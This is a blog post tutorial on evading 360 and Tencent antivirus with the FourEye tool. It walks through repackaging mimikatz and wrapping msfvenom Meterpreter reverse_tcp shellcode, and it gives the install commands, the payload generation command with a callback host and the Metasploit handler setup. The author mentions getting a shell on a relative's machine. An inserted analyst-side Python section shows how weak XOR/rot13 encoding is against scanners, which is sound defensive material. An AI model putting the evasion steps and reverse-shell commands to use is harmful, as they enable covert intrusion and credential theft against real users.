msfconsole AV evasion: perfectly bypassing 360


This post recommends a fairly good AV-evasion tool that is simple to install and evades detection reasonably well: FourEye. Let's take a look at it together.

Installation and environment

Test environment

  • Kali 2022
  • Windows 7 (64-bit)

Installing dependencies

Install mingw-w64; without it the tool cannot build the generated shells. Installation is simple: just run the command below.

apt-get install mingw-w64

http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/2222_20220917215335.png

Downloading and installing the project

git clone https://github.com/lengjibo/FourEye.git
cd FourEye
pip install -r requirements.txt
python3 BypassFramework.py

If all goes well, a successful installation looks like this:

http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/3333_20220917215521.png

A first try

Here we test with mimikatz.exe; first download the tool from GitHub. Normally this tool is deleted outright by security software.
After starting the script, choose the EXE type, enter the absolute path to mimikatz, press Enter and wait a moment; a renamed mimikatz is generated in the /root directory.

http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/555_20220917220551.png
Evasion result

http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/5656_20220917225633.png
Looks pretty good: the mainstream domestic products, 360 and Tencent, both fail to detect it.

Shellcode-based evasion

After running the command, enter the shellcode.

http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/67_20220917225839.png
Type list to see all available payloads.

Choose the evasion method

  • 1: Fiber
  • 2: APC
  • 3: Image separation (payload split out into an image)

Choose the encryption method

xor or rot13
Choose the bitness: x64 or x86

Generate the shell and execute it

http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/88899_20220917230313.png
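As an added example that is not part of this post or of the FourEye project: the "xor or rot13" step above is there to hide the shellcode from static scanning. Seen from the analyst's side, a single-byte XOR or a fixed byte rotation is undone by trying every possible key and looking for a known stager prologue, which is exactly what scanners and sandboxes do, so this layer on its own buys very little. The script below assumes XOR with one key byte for the whole blob and treats "rot13" as adding 13 to every byte modulo 256 (both are assumptions; the post does not document FourEye's actual scheme). The sample blob is constructed for the demonstration and is not a working payload.

```python
# Added example, not code from the post or from FourEye. Analyst-side check of how
# much a single-byte XOR or a fixed byte rotation hides from a scanner.
# Assumptions (not stated in the post): XOR uses one key byte for the whole blob,
# and "rot13" means adding 13 to every byte modulo 256.
from typing import Optional, Tuple

# Opening bytes of the well-known msfvenom Windows stagers:
#   x64: cld; and rsp, -0x10      x86: cld; call +0x82
X64_STAGER_PROLOGUE = b"\xfc\x48\x83\xe4\xf0"
X86_STAGER_PROLOGUE = b"\xfc\xe8\x82\x00\x00\x00"
MARKERS = (X64_STAGER_PROLOGUE, X86_STAGER_PROLOGUE)


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with one key byte; applying it twice restores the input."""
    return bytes(b ^ key for b in data)


def rotate_bytes(data: bytes, shift: int) -> bytes:
    """Add `shift` to every byte modulo 256 (assumed meaning of the tool's 'rot13')."""
    return bytes((b + shift) % 256 for b in data)


def find_marker(data: bytes) -> int:
    """Offset of the first known stager prologue in `data`, or -1 if none is present."""
    hits = [h for h in (data.find(m) for m in MARKERS) if h >= 0]
    return min(hits) if hits else -1


def recover_xor(blob: bytes) -> Optional[Tuple[int, int, bytes]]:
    """Brute-force the single-byte XOR key.

    Returns (key, offset, decoded) when a known prologue shows up under some key;
    key 0 simply means the blob was never obfuscated. 256 trials are cheap, which
    is why this kind of encoding costs a scanner almost nothing.
    """
    for key in range(256):
        decoded = xor_bytes(blob, key)
        offset = find_marker(decoded)
        if offset >= 0:
            return key, offset, decoded
    return None


def recover_rotation(blob: bytes, shift: int = 13) -> Optional[Tuple[int, bytes]]:
    """Undo a fixed byte rotation; there is no key to search for at all."""
    decoded = rotate_bytes(blob, -shift)
    offset = find_marker(decoded)
    return (offset, decoded) if offset >= 0 else None


# Constructed sample: a real prologue followed by harmless ASCII filler, so the scan
# has something to recognise. It is not a working payload.
SAMPLE_PLAIN = X64_STAGER_PROLOGUE + b"CONSTRUCTED-FILLER-NOT-A-PAYLOAD"
SAMPLE_XORED = xor_bytes(SAMPLE_PLAIN, 0x5A)
SAMPLE_ROTATED = rotate_bytes(SAMPLE_PLAIN, 13)

if __name__ == "__main__":
    hit = recover_xor(SAMPLE_XORED)
    print("xor:", None if hit is None else f"key=0x{hit[0]:02x} offset={hit[1]}")
    rot = recover_rotation(SAMPLE_ROTATED)
    print("rot13:", None if rot is None else f"offset={rot[0]}")
    print("plain ASCII blob:", recover_xor(b"nothing to see here"))
```

The marker search is the same idea behind YARA rules and tools such as xorsearch: once a scanner knows one recognisable fragment of the plaintext, a keyspace of 256 (or, for the rotation, of exactly one) is not an obstacle. A multi-byte key raises the cost only modestly, since each key byte can still be recovered independently against a known fragment.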

Evasion for msfconsole

When we play with msf, the generated shell is the most basic kind and is easily caught and removed; this tool solves that problem perfectly.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.123.23 LPORT=7788 -f raw -o shell.raw

Configure msf

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.123.23
set lport 444
exploit

Session check-in

http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/33334444_20220917234904.png

360 scan result

http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/77788_20220917235236.png

Summary

This tool is relatively simple to install and use, and its evasion results are fairly good. But for some unknown reason I could not get a callback on Windows 10; I only managed to get a shell on my cousin's 64-bit Windows 7 machine.


Copyright: 逍遥子大表哥

Original link: https://blog.bbskali.cn/3667.html

Licensed under the Creative Commons Attribution-NonCommercial 4.0 International License; reposts and citations of this article should follow the same license.
